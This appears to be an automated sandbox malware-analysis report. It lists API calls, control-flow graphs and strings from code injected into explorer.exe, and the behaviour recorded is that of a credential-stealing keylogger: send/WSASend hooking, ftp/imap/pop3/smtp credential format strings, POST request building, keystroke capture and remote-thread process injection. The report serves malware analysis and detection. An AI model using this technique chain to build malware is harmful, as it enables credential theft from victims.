                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 03222685
                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0322269F
                                                                        • wsprintfA.USER32 ref: 032226B6
                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 032226CF
                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 032226D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                        • String ID: %02X
                                                                        • API String ID: 3341110664-436463671
                                                                        • Opcode ID: 920e364b8fd0885101472962ccb668493c52ad142fee47072a489e927d66d733
                                                                        • Instruction ID: 6d49a99264a5cf780e8b5f3c281ec0e737335f162fbc16e18007fc37146d8e22
                                                                        • Opcode Fuzzy Hash: 920e364b8fd0885101472962ccb668493c52ad142fee47072a489e927d66d733
                                                                        • Instruction Fuzzy Hash: 76111976A00108BFDB21EB95EC88EAEBFBCEB44741F108065F645E2154D6754E459B70

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 03221B4E
                                                                        • LoadLibraryA.KERNEL32(?,03224434,00000000,00000000,75922EE0,00000000,03221910,?,?,?,00000001,?,00000000), ref: 03221B76
                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 03221BA3
                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 03221BF4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                        • String ID:
                                                                        • API String ID: 3827878703-0
                                                                        • Opcode ID: e9a3352b232dc01754ed49fd5898650d7b3954f92473316484ee97e3081bcc74
                                                                        • Instruction ID: 4d0f74f00511deb34d1f83876a9551cc641c9b62f210903abc32dd29c18da6fc
                                                                        • Opcode Fuzzy Hash: e9a3352b232dc01754ed49fd5898650d7b3954f92473316484ee97e3081bcc74
                                                                        • Instruction Fuzzy Hash: 0A318679710226BBC724CE29CC85B66BBA8AF15315B18456DE886C7200E775F8A5CBA0

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03222861: GetProcessHeap.KERNEL32(00000008,0000A000,032210CC), ref: 03222864
                                                                          • Part of subcall function 03222861: RtlAllocateHeap.NTDLL(00000000), ref: 0322286B
                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0322109E,?,03221010), ref: 0322134A
                                                                        • GetCurrentProcessId.KERNEL32(00000003,?,0322109E,?,03221010), ref: 0322135B
                                                                        • wsprintfA.USER32 ref: 03221372
                                                                          • Part of subcall function 0322263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0322265A
                                                                          • Part of subcall function 0322263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 03222672
                                                                          • Part of subcall function 0322263E: lstrlen.KERNEL32(?,00000000), ref: 0322267A
                                                                          • Part of subcall function 0322263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 03222685
                                                                          • Part of subcall function 0322263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0322269F
                                                                          • Part of subcall function 0322263E: wsprintfA.USER32 ref: 032226B6
                                                                          • Part of subcall function 0322263E: CryptDestroyHash.ADVAPI32(?), ref: 032226CF
                                                                          • Part of subcall function 0322263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 032226D9
                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 03221389
                                                                        • GetLastError.KERNEL32 ref: 0322138F
                                                                        • Sleep.KERNEL32(000001F4), ref: 032213A1
                                                                          • Part of subcall function 032224D5: GetCurrentProcessId.KERNEL32 ref: 032224E7
                                                                          • Part of subcall function 032224D5: GetCurrentThreadId.KERNEL32 ref: 032224EF
                                                                          • Part of subcall function 032224D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 032224FF
                                                                          • Part of subcall function 032224D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0322250D
                                                                          • Part of subcall function 032224D5: CloseHandle.KERNEL32(00000000), ref: 03222566
                                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 032213B8
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 032213BF
                                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 032213E4
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 032213EB
                                                                          • Part of subcall function 03221DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 03221E1D
                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0322141D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                        • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                        • API String ID: 706757162-1430290102
                                                                        • Opcode ID: 814e7b4ae8de66d3c7444b5c06eb94ba296063e022bb1a84a8540e974700fa2f
                                                                        • Instruction ID: 069c0f3b5237fb91fba9661fe5576e037d72163ac89bf23f019725af925dfe25
                                                                        • Opcode Fuzzy Hash: 814e7b4ae8de66d3c7444b5c06eb94ba296063e022bb1a84a8540e974700fa2f
                                                                        • Instruction Fuzzy Hash: 77318139350324BBCB20FFA1EC0DF6E7E55AB15B01F009414FB099A594CBBA9991CBA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 236 3221647-322165a 237 3221660-3221662 236->237 238 3221748-322174f 236->238 237->238 239 3221668-322166b 237->239 239->238 240 3221671-322167d lstrlen 239->240 241 3221683-322168a lstrlen 240->241 242 3221747 240->242 241->242 243 3221690-32216a8 getpeername 241->243 242->238 243->242 244 32216ae-32216ca inet_ntoa htons 243->244 244->242 245 32216cc-32216d4 244->245 246 32216d6-32216d9 245->246 247 3221708 245->247 248 32216f3-32216f8 246->248 249 32216db-32216de 246->249 250 322170d-322173c call 3222861 wsprintfA call 32224ae 247->250 248->250 251 32216e0-32216e3 249->251 252 3221701-3221706 249->252 250->242 260 322173e-3221745 call 3222843 250->260 254 32216e5-32216ea 251->254 255 32216fa-32216ff 251->255 252->250 254->248 257 32216ec-32216f1 254->257 255->250 257->242 257->248 260->242
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                        • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                        • API String ID: 3379139566-1703351401
                                                                        • Opcode ID: 6748c8daf32ec838e8c20b75544f0d50a01fa35e257f7c2e0f102e3358f00b1a
                                                                        • Instruction ID: b43876b41ce8929c593e19bdb267e25b8e6081a3ce5f7395ab1fe1c9f55e8b01
                                                                        • Opcode Fuzzy Hash: 6748c8daf32ec838e8c20b75544f0d50a01fa35e257f7c2e0f102e3358f00b1a
                                                                        • Instruction Fuzzy Hash: 7A21EA35E2072AB7DF10DEA99C48DBEBEBD9B85101B0C4175E904D3114CB75DDA08A60

                                                                        Control-flow Graph

                                                                        control_flow_graph 268 3221752-3221774 GetModuleHandleA GetProcAddress 269 32217c1-32217c6 268->269 270 3221776-32217c0 RtlZeroMemory * 4 268->270 270->269
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,03221539,?,?,?,0322144B,?), ref: 03221763
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0322176A
                                                                        • RtlZeroMemory.NTDLL(03224228,00000104), ref: 03221788
                                                                        • RtlZeroMemory.NTDLL(03224118,00000104), ref: 03221790
                                                                        • RtlZeroMemory.NTDLL(03224330,00000104), ref: 03221798
                                                                        • RtlZeroMemory.NTDLL(03224000,00000104), ref: 032217A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MemoryZero$AddressHandleModuleProc
                                                                        • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                        • API String ID: 1490332519-278825019
                                                                        • Opcode ID: e32d3112b659024e3179f29fa3738c01041425ab31507cb39e3d96bf5fe2b3bc
                                                                        • Instruction ID: 45a4aa599cca48f27216822b48bf832861b725e82a0afb1e5ef04f1192e9f1bd
                                                                        • Opcode Fuzzy Hash: e32d3112b659024e3179f29fa3738c01041425ab31507cb39e3d96bf5fe2b3bc
                                                                        • Instruction Fuzzy Hash: 0AF08926BA033C3BC120F2AB7C0AC4FBD5CC5A1DA63520251BB146750389A9798049F4

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 032224E7
                                                                        • GetCurrentThreadId.KERNEL32 ref: 032224EF
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 032224FF
                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 0322250D
                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0322252C
                                                                        • SuspendThread.KERNEL32(00000000), ref: 0322253C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0322254B
                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0322255B
                                                                        • CloseHandle.KERNEL32(00000000), ref: 03222566
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 1467098526-0
                                                                        • Opcode ID: fed6854004b0badc2f4a832df630f7357b109ee2cf97f355be9e90ab9a3c2016
                                                                        • Instruction ID: a032106f39d68cf88a789c8b477f668d90dc0d308b81636f8ca8185b724517e2
                                                                        • Opcode Fuzzy Hash: fed6854004b0badc2f4a832df630f7357b109ee2cf97f355be9e90ab9a3c2016
                                                                        • Instruction Fuzzy Hash: A6117C75504311FFD724EF60BC0CB6EBFA8FB95B01F048919F68192144D7398A598BB2

                                                                        Control-flow Graph

                                                                        control_flow_graph 282 3221f4a-3221fa5 call 32222b8 call 3222861 call 32227e2 call 3222374 291 3221fc0-3221fcc 282->291 292 3221fa7-3221fbe 282->292 295 3221fd0-3221fd2 291->295 292->295 296 32222a6-32222b5 call 3222843 295->296 297 3221fd8-322200f RtlZeroMemory 295->297 301 3222015-3222030 297->301 302 322229e-32222a5 297->302 303 3222062-3222074 301->303 304 3222032-3222043 call 32222e5 301->304 302->296 309 3222078-322207a 303->309 310 3222056 304->310 311 3222045-3222054 304->311 313 3222080-32220dc call 3222731 309->313 314 322228b-3222291 309->314 312 3222058-3222060 310->312 311->312 312->309 322 32220e2-32220e7 313->322 323 3222284 313->323 315 3222293-3222295 call 3222843 314->315 316 322229a 314->316 315->316 316->302 324 3222101-322212f call 3222861 wsprintfW 322->324 325 32220e9-32220fa 322->325 323->314 328 3222131-3222133 324->328 329 3222148-322215f 324->329 325->324 330 3222134-3222137 328->330 335 3222161-3222197 call 3222861 wsprintfW 329->335 336 322219e-32221b8 329->336 331 3222142-3222144 330->331 332 3222139-322213e 330->332 331->329 332->330 334 3222140 332->334 334->329 335->336 340 3222261-3222277 call 3222843 336->340 341 32221be-32221d1 336->341 349 3222280 340->349 350 3222279-322227b call 3222843 340->350 341->340 344 32221d7-32221ed call 3222861 341->344 351 32221ef-32221fa 344->351 349->323 350->349 353 322220e-3222225 351->353 354 32221fc-3222209 call 3222826 351->354 358 3222227 353->358 359 3222229-3222236 353->359 354->353 358->359 359->351 360 3222238-322223c 359->360 361 3222256-322225d call 3222843 360->361 362 322223e 360->362 361->340 363 322223e call 3222815 362->363 365 3222243-3222250 RtlMoveMemory 363->365 365->361
                                                                        APIs
                                                                          • Part of subcall function 03222861: GetProcessHeap.KERNEL32(00000008,0000A000,032210CC), ref: 03222864
                                                                          • Part of subcall function 03222861: RtlAllocateHeap.NTDLL(00000000), ref: 0322286B
                                                                          • Part of subcall function 032227E2: lstrlen.KERNEL32(032240DA,?,00000000,00000000,03221F86,75918A60,032240DA,00000000), ref: 032227EA
                                                                          • Part of subcall function 032227E2: MultiByteToWideChar.KERNEL32(00000000,00000000,032240DA,00000001,00000000,00000000), ref: 032227FC
                                                                          • Part of subcall function 03222374: RtlZeroMemory.NTDLL(?,00000018), ref: 03222386
                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 03221FE2
                                                                        • wsprintfW.USER32 ref: 0322211B
                                                                        • wsprintfW.USER32 ref: 03222186
                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 03222250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                        • API String ID: 4204651544-1701262698
                                                                        • Opcode ID: 1f65f9cd437e2382671c502a8f000462c1183544df76326bf08901450f60cd15
                                                                        • Instruction ID: b6472a27b7cfb9030e5bf2d9bead3f02a1a9083f47ec4880a140422eea04df7a
                                                                        • Opcode Fuzzy Hash: 1f65f9cd437e2382671c502a8f000462c1183544df76326bf08901450f60cd15
                                                                        • Instruction Fuzzy Hash: C5A19C74618315FFC360EF64DC84A2BBFE8EB88740F04492DFA85D7251DA76DA448B62

                                                                        Control-flow Graph

                                                                        control_flow_graph 367 32225ad-32225c9 OpenProcess 368 3222600-3222607 367->368 369 32225cb-32225da IsWow64Process 367->369 370 32225f7 369->370 371 32225dc-32225ec IsWow64Process 369->371 372 32225f9-32225fa CloseHandle 370->372 371->372 373 32225ee-32225f5 371->373 372->368 373->372
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,7591E800,?,?,microsoftedgecp.exe,03221287), ref: 032225BF
                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 032225D1
                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 032225E4
                                                                        • CloseHandle.KERNEL32(00000000), ref: 032225FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                        • String ID: microsoftedgecp.exe
                                                                        • API String ID: 331459951-1475183003
                                                                        • Opcode ID: aa7e5bd38de0a34635ec9ef3d9d0d98df444393fd0f11de21675462534e11964
                                                                        • Instruction ID: f3ca8f1775093c987f7d4334859366dcc0b8b46a0edac2b12033237f133dfd76
                                                                        • Opcode Fuzzy Hash: aa7e5bd38de0a34635ec9ef3d9d0d98df444393fd0f11de21675462534e11964
                                                                        • Instruction Fuzzy Hash: 6DF0BB7691232DFF9B20DF90AD488FEBB6CEF01251B145259FA0092140D7354F44E6B0

                                                                        Execution Graph

                                                                        Execution Coverage:8.7%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:9
                                                                        Total number of Limit Nodes:2
                                                                        execution_graph 769 d29fab 770 d29fd8 769->770 772 d29ff8 769->772 773 d2a048 770->773 777 d2a04d 773->777 774 d2a190 VirtualProtect VirtualProtect 776 d2a1e8 774->776 775 d2a135 LoadLibraryA 775->777 776->776 777->774 777->775 778 d2a185 777->778 778->772

                                                                        Callgraph

                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00D218D0 1 Function_00D21D50 49 Function_00D21838 1->49 2 Function_00D21254 3 Function_00D214D4 4 Function_00D21DD4 4->49 5 Function_00D22054 5->0 8 Function_00D21F40 5->8 14 Function_00D21E70 5->14 19 Function_00D218F8 5->19 23 Function_00D21860 5->23 28 Function_00D22010 5->28 45 Function_00D2188C 5->45 5->49 50 Function_00D21938 5->50 6 Function_00D21C58 7 Function_00D2355C 7->7 12 Function_00D230F0 7->12 15 Function_00D21B70 7->15 7->49 53 Function_00D23220 7->53 8->19 8->49 9 Function_00D24A41 10 Function_00D225C4 21 Function_00D225FC 10->21 11 Function_00D2A048 38 Function_00D2A00A 11->38 12->6 12->23 40 Function_00D21A88 12->40 42 Function_00D22508 12->42 12->49 13 Function_00D22B70 35 Function_00D21A04 13->35 13->49 16 Function_00D21576 17 Function_00D22774 18 Function_00D22BF4 20 Function_00D214F9 22 Function_00D224E0 23->15 24 Function_00D21560 25 Function_00D22860 25->15 25->17 54 Function_00D22620 25->54 26 Function_00D218E8 27 Function_00D2156C 28->35 29 Function_00D22418 29->5 29->23 29->49 30 Function_00D22E98 30->4 30->13 30->18 30->35 43 Function_00D22E08 30->43 51 Function_00D22CB8 30->51 31 Function_00D24019 32 Function_00D2141D 33 Function_00D21000 34 Function_00D22E80 36 Function_00D24004 37 Function_00D21405 39 Function_00D21508 41 Function_00D21C08 42->0 42->10 42->22 43->1 43->23 43->26 43->29 44 Function_00D23088 44->15 44->30 45->49 46 Function_00D2B00C 47 Function_00D214B2 48 Function_00D21BB0 51->23 51->49 55 Function_00D21D20 51->55 52 Function_00D21822 53->15 53->25 53->41 53->48 53->49 53->50 59 Function_00D21C28 53->59 56 Function_00D23020 56->15 56->30 57 Function_00D245A7 58 Function_00D29FAB 58->11

                                                                        Control-flow Graph

                                                                        control_flow_graph 119 d2355c-d2356c call d21b70 122 d23572-d235a5 call d21838 119->122 123 d235fc-d23601 119->123 127 d235d1-d235f6 NtUnmapViewOfSection 122->127 128 d235a7 call d21838 122->128 132 d23608-d23617 call d23220 127->132 133 d235f8-d235fa 127->133 130 d235ac-d235c5 128->130 130->127 138 d23621-d2362a 132->138 139 d23619-d2361c call d2355c 132->139 133->123 134 d23602-d23607 call d230f0 133->134 134->132 139->138
                                                                        APIs
                                                                        • NtUnmapViewOfSection.NTDLL ref: 00D235D8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.4535198953.0000000000D21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D21000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_d21000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: SectionUnmapView
                                                                        • String ID:
                                                                        • API String ID: 498011366-0
                                                                        • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                        • Instruction ID: 045512904ea94087d8484ad0e42319be6b9fbbd755f110a12a04d5d091dd2c24
                                                                        • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                        • Instruction Fuzzy Hash: FF11C430611A195FEB58BBB8A89D27937A0FB35306F58413AA419C76A1DA3D8A41C721

                                                                        Control-flow Graph

                                                                        control_flow_graph 0 d23220-d2325b call d21838 3 d23261-d23273 CreateToolhelp32Snapshot 0->3 4 d23549-d23554 SleepEx 3->4 5 d23279-d2328f Process32First 3->5 4->3 6 d23538-d2353a 5->6 7 d23540-d23543 CloseHandle 6->7 8 d23294-d232ac 6->8 7->4 10 d232b2-d232c6 8->10 11 d2348c-d23495 call d21bb0 8->11 10->11 17 d232cc-d232e0 10->17 15 d2352a-d23532 Process32Next 11->15 16 d2349b-d234a4 call d21c08 11->16 15->6 16->15 21 d234aa-d234b1 call d21c28 16->21 17->11 22 d232e6-d232fa 17->22 21->15 27 d234b3-d234c1 call d21b70 21->27 22->11 26 d23300-d23314 22->26 26->11 31 d2331a-d2332e 26->31 27->15 32 d234c3-d23525 call d21938 call d22860 call d21938 27->32 31->11 36 d23334-d23348 31->36 32->15 36->11 41 d2334e-d23362 36->41 41->11 44 d23368-d2337c 41->44 44->11 46 d23382-d23396 44->46 46->11 48 d2339c-d233b0 46->48 48->11 50 d233b6-d233ca 48->50 50->11 52 d233d0-d233e4 50->52 52->11 54 d233ea-d233fe 52->54 54->11 56 d23404-d23418 54->56 56->11 58 d2341a-d2342e 56->58 58->11 60 d23430-d23444 58->60 60->11 62 d23446-d2345a 60->62 62->11 64 d2345c-d23470 62->64 64->11 66 d23472-d23486 64->66 66->11 66->15
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.4535198953.0000000000D21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D21000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_d21000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 2482764027-0
                                                                        • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                        • Instruction ID: 2cc9473a00afce1ca9c2387fe84fcab58a5ea01cd028c46f6f02306f1361e079
                                                                        • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                        • Instruction Fuzzy Hash: 518131312186188FE706EF14FC58BEAB7A1FB61744F44866AE446C7160EF7CDA05CBA1

                                                                        Control-flow Graph

                                                                        control_flow_graph 68 d2a048-d2a04b 69 d2a055-d2a059 68->69 70 d2a065 69->70 71 d2a05b-d2a063 69->71 72 d2a067 70->72 73 d2a04d-d2a053 70->73 71->70 74 d2a06a-d2a071 72->74 73->69 76 d2a073-d2a07b 74->76 77 d2a07d 74->77 76->77 77->74 78 d2a07f-d2a082 77->78 79 d2a097-d2a0a4 78->79 80 d2a084-d2a092 78->80 90 d2a0a6-d2a0a8 79->90 91 d2a0be-d2a0cc call d2a00a 79->91 81 d2a094-d2a095 80->81 82 d2a0ce-d2a0e9 80->82 81->79 84 d2a11a-d2a11d 82->84 85 d2a122-d2a129 84->85 86 d2a11f-d2a120 84->86 89 d2a12f-d2a133 85->89 88 d2a101-d2a105 86->88 92 d2a107-d2a10a 88->92 93 d2a0eb-d2a0ee 88->93 94 d2a190-d2a1e4 VirtualProtect * 2 89->94 95 d2a135-d2a14e LoadLibraryA 89->95 96 d2a0ab-d2a0b2 90->96 91->69 92->85 97 d2a10c-d2a110 92->97 93->85 101 d2a0f0 93->101 98 d2a1e8-d2a1ed 94->98 100 d2a14f-d2a156 95->100 113 d2a0b4-d2a0ba 96->113 114 d2a0bc 96->114 102 d2a112-d2a119 97->102 103 d2a0f1-d2a0f5 97->103 98->98 104 d2a1ef-d2a1fe 98->104 100->89 106 d2a158 100->106 101->103 102->84 103->88 107 d2a0f7-d2a0f9 103->107 110 d2a164-d2a16c 106->110 111 d2a15a-d2a162 106->111 107->88 112 d2a0fb-d2a0ff 107->112 115 d2a16e-d2a17a 110->115 111->115 112->88 112->92 113->114 114->91 114->96 117 d2a185-d2a18f 115->117 118 d2a17c-d2a183 115->118 118->100
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE ref: 00D2A147
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 00D2A1BB
                                                                        • VirtualProtect.KERNELBASE ref: 00D2A1D9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.4535198953.0000000000D27000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D27000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_d27000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 895956442-0
                                                                        • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                        • Instruction ID: 9c3d15c81fda128d01fb23f3e0a0c05022000a30557f1dd11d44358a7c2831b4
                                                                        • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                        • Instruction Fuzzy Hash: D3517A31358A3D4BCB25AA3CBDC46B5B7C1E775339F18062AD48AC3289D959D84683A3

                                                                        Execution Graph

                                                                        Execution Coverage:9.6%
                                                                        Dynamic/Decrypted Code Coverage:97.5%
                                                                        Signature Coverage:17.7%
                                                                        Total number of Nodes:322
                                                                        Total number of Limit Nodes:4
                                                                        • Rendered graph (node list only); API chains recoverable from the nodes, all in the code mapped at 03091000 in explorer.exe plus a stub at 03099AE0:
                                                                        • 0309162B / 030916B9 / 030917DC: GetKeyboardState, ToUnicode, RtlEnterCriticalSection/RtlLeaveCriticalSection, lstrlenW, GetForegroundWindow, GetWindowTextW, GetClassNameW, lstrcmpW, lstrcpyW, lstrcatW, GetLocalTime, wsprintfW, heap allocation (keystroke and foreground-window capture into a heap buffer).
                                                                        • 0309182D / 030925A4 / 0309200D / 030920A1 / 0309243D: RtlEnterCriticalSection, lstrlenW, Sleep, CryptBinaryToStringA, lstrlen, lstrcat, MultiByteToWideChar, RtlZeroMemory, wsprintfW, VirtualAlloc, RtlMoveMemory, DnsQuery_W, DnsFree, inet_ntoa, VirtualFree (buffer encoding and DNS resolution inside a Sleep loop).
                                                                        • 03091581 / 0309293E: GlobalLock, lstrlenW, lstrcatW, MultiByteToWideChar, VirtualQuery, GlobalUnlock, then the 030916B9 routine.
                                                                        • 03091000 / 03091016 / 030910A5: VirtualQuery, RtlMoveMemory, GetCurrentProcessId, wsprintfA, OpenFileMappingA + MapViewOfFile, UnmapViewOfFile + CloseHandle, lstrlen, CreateToolhelp32Snapshot, Process32First/Process32Next, CharLowerA, lstrcmpiA, OpenProcess + IsWow64Process, Sleep (process-enumeration polling loop).
                                                                        • 030913AE / 03092799 (reached from 03091016): RtlZeroMemory, VirtualQuery, GetModuleFileNameA, GetCurrentProcessId, wsprintfA, CryptAcquireContextA, CryptCreateHash, CryptHashData, CryptGetHashParam, CryptDestroyHash, CryptReleaseContext, CreateMutexA + GetLastError, RtlInitializeCriticalSection, Sleep, GetModuleHandleA + GetProcAddress, CreateThread + CloseHandle, RtlExitUserThread.
                                                                        • 030925F1: GetCurrentProcessId, GetCurrentThreadId, CreateToolhelp32Snapshot, Thread32First/Thread32Next, OpenThread, SuspendThread or ResumeThread, CloseHandle (walks the process's own threads).
                                                                        • 03091F3A / 03091E89 / 03091ED8 / 03091FEA: VirtualProtect, VirtualAlloc, RtlMoveMemory, VirtualQuery, lstrcmp.
                                                                        • 030912AE: VirtualAlloc, lstrlen, RtlZeroMemory, RtlMoveMemory, PathMatchSpecA, VirtualFree.
                                                                        • 030918BF / 03091B26 / 03091BBD: VirtualQuery, OpenProcess, NtSetInformationProcess, NtCreateSection, NtMapViewOfSection, RtlMoveMemory, NtUnmapViewOfSection, LoadLibraryA, GetProcAddress, LdrProcessRelocationBlock, CreateMutexA + GetLastError, GetModuleHandleA + GetProcAddress, ReadProcessMemory, WriteProcessMemory, CreateRemoteThread, CloseHandle, Sleep (maps a section into an opened process, applies relocations and starts a remote thread).
                                                                        • 03099AE0: LoadLibraryA, GetProcAddress, VirtualProtect x2 (import-resolving loader stub).
                                                                        • Helpers: 03092724 VirtualQuery; 03092A09 GetProcessHeap + RtlAllocateHeap; 030929EB VirtualQuery + GetProcessHeap + HeapFree; 030929BD VirtualAlloc; 030929AE VirtualFree; 0309298A lstrlen + MultiByteToWideChar; 0309276D OpenFileMappingA + MapViewOfFile; 0309275A UnmapViewOfFile + CloseHandle; 03092841 lstrlen x2; 03092569 lstrlen + RtlMoveMemory; 030926C9 OpenProcess + IsWow64Process + CloseHandle.

                                                                        Callgraph

